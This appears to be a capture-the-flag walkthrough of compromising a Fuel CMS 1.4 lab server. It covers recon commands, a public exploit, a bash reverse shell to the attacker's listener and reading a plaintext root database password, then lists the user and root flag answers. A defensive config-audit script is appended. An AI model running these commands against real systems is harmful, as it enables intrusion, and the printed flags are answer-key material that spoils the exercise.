A new start-up has a few issues with their web server
Scan the target with nmap
nmap -A -T4 10.10.138.185
Hmm, found only 1 open port 80 (http)
Go to the web page
It's the default page of Fuel CMS 1.4
Use Gobuster to discover hidden directories
gobuster dir -u http://10.10.138.185 -w /usr/share/wordlists/dirb/common.txt -t 30
I connected to the /0/ and /home/ directories, maybe in vain
I had logged in and saw nothing there either
I searched for an exploit for fuelcms
searchsploit fuelcms 1.4
Copy the exploit
searchsploit -m 47138.py
vi 47138.py
Change line 14 to the target IP
chmod +x 47138.py
python 47138.py
Now we open a reverse shell for easier control
vi rev.sh
bash -i >& /dev/tcp/<your_ip>/4444 0>&1
Open 2 tabs
python3 -m http.server 80 # http server to download file
and
nc -vlnp 4444 # netcat listener on port 4444
Next
Okay, we got a shell
Search for the flag in /home
Flag | User.txt |
---|---|
Answer | 6470e394cbf6dab6a91682cc8585059b |
I tried sudo -l -l
but it didn't work
During reconnaissance I noticed some instructions related to database configuration on the webpage
cat fuel/application/config/database.php
There it is
user: root, pass: mememe
I got an error; after a Google search, here is the solution
python -c 'import pty; pty.spawn("/bin/sh")'
echo os.system('/bin/bash')
/bin/sh -i
Here you are
Flag | root.txt |
---|---|
Answer | b9bbcb33e11b80be759c4e844862482d |
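From the defender's side, the step that exposed `user: root, pass: mememe` is a plaintext credential in `fuel/application/config/database.php` that the web-server account could read. The following audit sketch is an added example, not part of the original write-up or of Fuel CMS; the sample file body is constructed in the CodeIgniter-style `'key' => 'value'` layout, and the function names, the privileged-account list and the 12-character threshold are assumptions.

```python
import re

# Constructed sample in a CodeIgniter-style layout (not the target's real file).
SAMPLE_CONFIG = r"""
<?php
$active_group = 'default';
$db['default'] = array(
    'dsn'      => '',
    'hostname' => 'localhost',
    // 'username' => 'old_account',
    'username' => 'root',
    'password' => 'mememe',
    'database' => 'cms_db',
    'dbdriver' => 'mysqli',
);
"""

PAIR = re.compile(r"""['"](\w+)['"]\s*=>\s*['"]([^'"]*)['"]""")
PRIVILEGED = {"root", "admin", "sa", "postgres"}  # assumed list, extend as needed


def parse_db_settings(php_source):
    """Return the 'key' => 'value' string pairs, skipping commented-out lines."""
    settings = {}
    for line in php_source.splitlines():
        stripped = line.strip()
        if stripped.startswith(("//", "#", "*", "/*")):
            continue
        for key, value in PAIR.findall(stripped):
            settings[key] = value
    return settings


def audit_db_config(php_source, file_mode=0o644, min_length=12):
    """List findings for a database.php body and its permission bits."""
    cfg = parse_db_settings(php_source)
    user, password = cfg.get("username", ""), cfg.get("password", "")
    findings = []
    if user.lower() in PRIVILEGED:
        findings.append(f"privileged database account in use: {user}")
    if not password:
        findings.append("empty database password")
    elif len(password) < min_length or password.isalpha() or password.isdigit():
        findings.append("weak database password")
    if file_mode & 0o004:
        findings.append("config file is world-readable")
    return findings


if __name__ == "__main__":
    for finding in audit_db_config(SAMPLE_CONFIG, file_mode=0o644):
        print("[!]", finding)
```

On a real host, pass the file's contents and `os.stat(path).st_mode` instead of the constructed sample.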